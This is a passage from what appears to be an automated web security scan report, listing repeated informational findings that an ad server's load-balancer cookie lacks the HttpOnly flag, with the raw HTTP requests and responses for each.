Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4614
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/747020510/Middle/
...[SNIP]...

14.375. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1761257569@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1761257569@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1761257569@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4565
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/441611668/Middle/
...[SNIP]...

14.376. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1766138964@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1766138964@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1766138964@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:52:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4800
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1276661447/Middle
...[SNIP]...

14.377. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1773027326@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1773027326@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1773027326@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4328
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/276208829/Middle/
...[SNIP]...

14.378. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1786991815@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1786991815@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1786991815@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4865
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/969651754/Middle/
...[SNIP]...

14.379. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1791676588@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1791676588@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1791676588@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4536
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/215617663/Middle/
...[SNIP]...

14.380. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1804055224@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1804055224@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1804055224@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4267
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/244718376/Middle/
...[SNIP]...

14.381. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1807334164@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1807334164@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1807334164@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4573
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1360676709/Middle
...[SNIP]...

14.382. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1828813500@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1828813500@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1828813500@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:00:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4803
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1946293802/Middle
...[SNIP]...

14.383. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829726854@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829726854@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829726854@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4259
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/91369350/Middle/D
...[SNIP]...

14.384. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829762158@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829762158@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829762158@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4575
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1841533540/Middle
...[SNIP]...

14.385. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1833270613@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1833270613@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1833270613@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4864
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/957722198/Middle/
...[SNIP]...

14.386. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1850925027@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1850925027@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1850925027@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4267
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018018031/Middle
...[SNIP]...

14.387. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1858082296@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1858082296@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1858082296@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4569
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1919132365/Middle
...[SNIP]...

14.388. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1864556706@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1864556706@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1864556706@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4570
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2027813664/Middle
...[SNIP]...

14.389. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1867138594@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1867138594@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1867138594@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4328
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
